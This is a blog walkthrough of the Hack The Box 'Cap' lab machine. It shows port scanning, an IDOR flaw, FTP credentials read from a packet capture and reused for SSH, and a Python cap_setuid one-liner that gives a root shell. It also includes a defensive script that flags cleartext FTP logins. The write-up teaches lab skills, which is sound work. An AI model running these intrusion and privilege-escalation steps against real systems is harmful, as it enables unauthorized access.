Hey there, and welcome to my blog! This space is where I share my journey through the world of ethical hacking, one machine at a time. Whether you’re just getting started or sharpening your skills, I hope these walkthroughs help you learn something new or approach challenges from a different angle.
Today, we’re diving into CAP, an easy-level retired machine from Hack The Box. This box introduces some great concepts like IDOR (Insecure Direct Object Reference), basic network traffic analysis, and privilege escalation through Linux capabilities — making it a perfect choice for beginners looking to get hands-on with real-world vulnerabilities.
🧠 Hack The Box — CAP
Difficulty: Easy
Skills Learned:
- IDOR (Insecure Direct Object Reference)
- FTP credentials from .pcap
- Privilege escalation via capabilities
- Network analysis using Wireshark
🔍 Enumeration
🔹 Nmap Scan
First step in enumeration is scanning for open ports:
nmap 10.10.10.245
This revealed:
PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh
80/tcp open  http
We follow up with a more aggressive scan to identify versions and scripts:
nmap -p21,22,80 -sC -sV -Pn 10.10.10.245
🌐 Web Enumeration (Port 80)
Navigating to http://10.10.10.245, we’re presented with a "Security Dashboard" application.
On interaction with “Security Snapshot”, the app redirects to:
/data/<id>
Example: http://10.10.10.245/data/0
This reveals that the URL pattern is predictable — suggesting an IDOR (Insecure Direct Object Reference) vulnerability.
🔹 IDOR Exploitation
Manually incrementing the /data/<id> value allows access to other users' PCAP scan results (e.g., /data/1, /data/2, etc.).
✅ TASK 2: The answer to “What is the [something]?” → data
✅ TASK 3: Can you access other users' scans? → yes
🕵️ Packet Capture Analysis (PCAPs)
Once we find a working scan (example: /data/0), we can download a PCAP.
Open the .pcap file in Wireshark and apply a display filter:
ftp
We observe:
USER nathan
PASS Buck3tH4TF0RM3!
📦 The credentials were transferred in plain text over FTP, which is expected for a plain FTP server (no FTPS/TLS): anyone who can capture the traffic can read the login.
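The Wireshark step above can be automated for the defender's side, for example to flag cleartext FTP logins in any capture. This is an added example, not code from the original post: it builds a tiny constructed pcap (Ethernet/IPv4/TCP, placeholder addresses) carrying the same USER/PASS commands, then walks the records and reports every credential pair sent to TCP/21.

```python
import struct

def build_pcap(commands, dport=21):
    """Constructed test data: a minimal pcap (Ethernet/IPv4/TCP) carrying one
    FTP control-channel command per packet. Addresses are placeholders."""
    out = [struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)]  # LINKTYPE_ETHERNET
    for seq, text in enumerate(commands):
        data = text.encode()
        tcp = struct.pack("!HHIIBBHHH", 40000, dport, seq, 0, 0x50, 0x18, 8192, 0, 0)
        ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp) + len(data), 0, 0,
                         64, 6, 0, bytes([192, 168, 1, 10]), bytes([192, 168, 1, 20]))
        frame = b"\x00" * 12 + b"\x08\x00" + ip + tcp + data  # Ethernet, ethertype IPv4
        out.append(struct.pack("<IIII", 0, 0, len(frame), len(frame)) + frame)
    return b"".join(out)

def find_ftp_credentials(pcap):
    """Return (user, password) pairs sent in cleartext to TCP/21, in capture order."""
    magic = struct.unpack("<I", pcap[:4])[0]
    endian = "<" if magic == 0xA1B2C3D4 else ">"
    if struct.unpack(endian + "I", pcap[20:24])[0] != 1:
        raise ValueError("only Ethernet captures are handled")
    off, user, creds = 24, None, []
    while off + 16 <= len(pcap):
        incl_len = struct.unpack(endian + "I", pcap[off + 8:off + 12])[0]
        frame = pcap[off + 16:off + 16 + incl_len]
        off += 16 + incl_len
        # Skip anything that is not IPv4 over Ethernet carrying TCP (protocol 6)
        if len(frame) < 34 or frame[12:14] != b"\x08\x00" or frame[23] != 6:
            continue
        ihl = (frame[14] & 0x0F) * 4
        tcp = frame[14 + ihl:]
        if len(tcp) < 20 or struct.unpack("!H", tcp[2:4])[0] != 21:
            continue
        payload = tcp[(tcp[12] >> 4) * 4:]
        for line in payload.decode("ascii", "replace").splitlines():
            if line.upper().startswith("USER "):
                user = line[5:].strip()
            elif line.upper().startswith("PASS ") and user is not None:
                creds.append((user, line[5:].strip()))
                user = None  # a PASS only counts after a USER in the same stream
    return creds
```

Run over a real capture, any non-empty result is a cleartext login that should have gone over FTPS or SFTP.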
🔐 FTP Access
Using the extracted credentials:
ftp 10.10.10.245
- Username: nathan
- Password: Buck3tH4TF0RM3!
✅ Login successful. While there isn’t much to explore through FTP, these credentials are reused for SSH.
🔐 SSH Access
Logging in over SSH with the same credentials drops you into the nathan user shell.
In nathan's home directory, read the flag:
cat user.txt
✅ User Flag Acquired
🔧 Privilege Escalation
Time to check what’s misconfigured or exploitable.
🔹 Capabilities Enumeration
We run LinPEAS or manually inspect capabilities:
getcap -r / 2>/dev/null
We find:
/usr/bin/python3.8 = cap_setuid+ep
This means the python3.8 binary carries cap_setuid in its effective and permitted sets (+ep), so any user who can run it can call setuid() to change to any UID, including 0, without sudo or an SUID bit.
🔹 Exploit Python Capability for Root
Launch a root shell:
python3.8 -c 'import os; os.setuid(0); os.system("/bin/bash")'
Now verify:
whoami
Output:
root
Navigate to root’s home directory:
cd /root
cat root.txt
✅ Root Flag Acquired
💡 Takeaways
- IDOR is a simple yet powerful vulnerability. Always try predictable IDs in URLs.
- Cleartext credentials in network traffic (like FTP) are highly insecure.
- Linux capabilities can be just as dangerous as SUID binaries.
- Wireshark + PCAPs are treasure troves when analyzed properly.
🧠 Skills Learned
- IDOR Vulnerability Exploitation
- Network Traffic Analysis via Wireshark
- Linux Capabilities Misconfigurations
- Privilege Escalation with cap_setuid+ep